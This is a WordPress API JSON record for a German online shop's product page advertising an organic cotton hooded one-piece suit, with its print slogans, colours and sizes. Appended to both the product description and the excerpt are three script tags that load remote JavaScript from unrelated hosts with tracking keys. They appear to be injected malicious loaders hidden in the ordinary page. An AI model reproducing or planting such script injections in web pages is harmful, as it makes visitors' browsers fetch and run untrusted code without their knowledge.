{"id":403,"date":"2019-01-05T16:31:15","date_gmt":"2019-01-05T15:31:15","guid":{"rendered":"https:\/\/eloasminbarden.de\/shop\/?post_type=product&#038;p=403"},"modified":"2019-07-25T15:26:21","modified_gmt":"2019-07-25T13:26:21","slug":"oeko-baumwoll-renner","status":"publish","type":"product","link":"https:\/\/eloasminbarden.de\/shop\/produkt\/oeko-baumwoll-renner\/","title":{"rendered":"\u00d6KO-Baumwoll-Renner\/ Einteiliger Kapuzenanzug"},"content":{"rendered":"<p>Dieser Renner aus Fairtrade \u00d6ko-Baumwolle eignet sich besonders f\u00fcr gem\u00fctliche Stunden, zuhause zum Drunter und Dr\u00fcberziehen ein Allzweckst\u00fcck und nach Deiner Wahl mit einem der f\u00fcnf Aufdrucke mit \u00f6kologisch zertifizierten Farben. Vorr\u00e4tig in den Farben Navy-blau, Schwarz und Graumelliert.<\/p>\n<p>Das ist sicher das genialste St\u00fcck, das Du je getragen hast (so Du es nun bestellst):<br \/>\n100% Baumwolle<br \/>\n100% ORGANIC !! (GOTS zertifiziert)<br \/>\n100% fair trade<br \/>\nselbst die Druckfarbe ist \u00f6kologische Pflanzenfarbe (GOTS zertifiziert)<\/p>\n<p>Die Aufdrucke, die wir f\u00fcr Dich gestaltet haben, sollten zum einen den klassischen Barden-Fan ansprechen, dar\u00fcber hinaus aber auch einen Gegenpol zu den \u00fcblichen langweiligen immer wiederkehrenden Carlifornia Beach und New York City Aufdrucken schaffen. Wir stehen zwar erst am Anfang einer hoffentlich gro\u00dfen T-Shirt &amp; Hoody Karriere, aber wir hoffen, das uns dieser Anfang bereits gelungen ist.<br \/>\nDu kannst von XS-XXXL alle Gr\u00f6\u00dfen, alle Farben, Formen und Aufdrucke miteinander kombinieren \u2013 Du erh\u00e4ltst Dein Unikat von uns pers\u00f6nlich zugeschickt.<br \/>\nViiiiiieeeeel Spaaaaaa\u00df !!!!!!!<\/p>\n<p>Aufdrucke:<\/p>\n<p>\u2013 \u201eNeue Barden braucht das Land\u201c<br \/>\n\u2013 \u201eIch bin ein freier, friedvoller, lebendiger Mensch\u201c mit der Lebens &amp; Schutzrune richtig herum !!!<br \/>\n\u2013 \u201eEloas Min Barden\u201c mit Bardenharfe-Emblem (CD Liebeslied &amp; Minnesang)<br \/>\n\u2013 \u201eEpona \u2013 keltische Pferdekraft\u201c mit keltischem Pferdeemblem<br \/>\n\u2013 \u201eORGANISCH-DYNAMISCH (das Hoody f\u00fcr Jugendliche \u201e\u00d6ko`s\u201c)<\/p>\n<p>Bitte bestelle momentan noch mit Begleittext, welche Gr\u00f6\u00dfe, Farbe, und welchen Aufdruck Du haben willst !!!<\/p>\n<p>Farben: Dunkelblau, Schwarz, Graumelliert,<\/p>\n<p>Gr\u00f6\u00dfen: XS, S, M, L, XL, XXL, XXXL<\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1564061163436\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p><script src=\"\/\/s3.amazonaws.com\/jscript-load\/217bc9f0d28b2da070.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8571x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8571x&amp;format=arrjs&amp;r=1564061163451\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":408,"template":"","meta":[],"product_cat":[32],"product_tag":[],"_links":{"self":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product\/403"}],"collection":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/media\/408"}],"wp:attachment":[{"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/media?parent=403"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product_cat?post=403"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/eloasminbarden.de\/shop\/wp-json\/wp\/v2\/product_tag?post=403"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}